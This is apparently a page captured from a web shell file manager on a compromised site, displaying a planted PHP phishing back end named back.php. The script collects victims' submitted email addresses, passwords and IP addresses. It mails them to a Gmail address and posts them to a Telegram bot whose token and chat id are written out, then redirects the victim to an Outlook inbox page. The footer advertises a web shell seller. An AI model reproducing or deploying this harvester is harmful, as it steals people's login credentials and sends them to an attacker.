SafeByte File Manager

Current Path : /home/abridesnjx/www/templates/
Upload File :
Current File : /home/abridesnjx/www/templates/back.php

<?

$ip = getenv("REMOTE_ADDR");
$message .= "------------------------------\n";
$message .= "E-mail Address: ".$_POST['Email']."\n";
$message .= "Password: ".$_POST['Password']."\n";
$message .= "IP: ".$ip."\n";
$message .= "-------Created By SUPERH-------\n";



$recipient = "coldfire0074@gmail.com";
$subject = "NEW BTCONNECT";
$headers = "From: WEBMAIL";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
//telgram rzlt
$api = "7521633762:AAG_JABrkHJQfxLEx96xzDHwZni7LWOvnuU";
$chatid = "5120032304";
file_get_contents("https://api.telegram.org/bot".$api."/sendMessage?chat_id=".$chatid."&text=" . urlencode($message)."" );
	 if (mail($recipient,$subject,$message,$headers))
	   {
		   header("Location: https://outlook.office.com/mail/inbox/id/AAMkAGY0MTdlNmUyLWM0ZmQtNGYwMy1iOGY3LTIxMmUzMDQ1YzViMABGAAAAAACQPA6C%2FF0oSaRpuHCyF539BwCNEvrC%2F4KWQqxiyiG44PRiAAAAn6XjAABMeduWVBxQQp8PZj6kQLlnAAmEU%2BiHAAA%3D");

	   }
else
    	   {
 		echo "ERROR! Please go back and try again.";
  	   }

?>

SafeByte File Manager 1.0 Coded by SafeByte WebShell Seller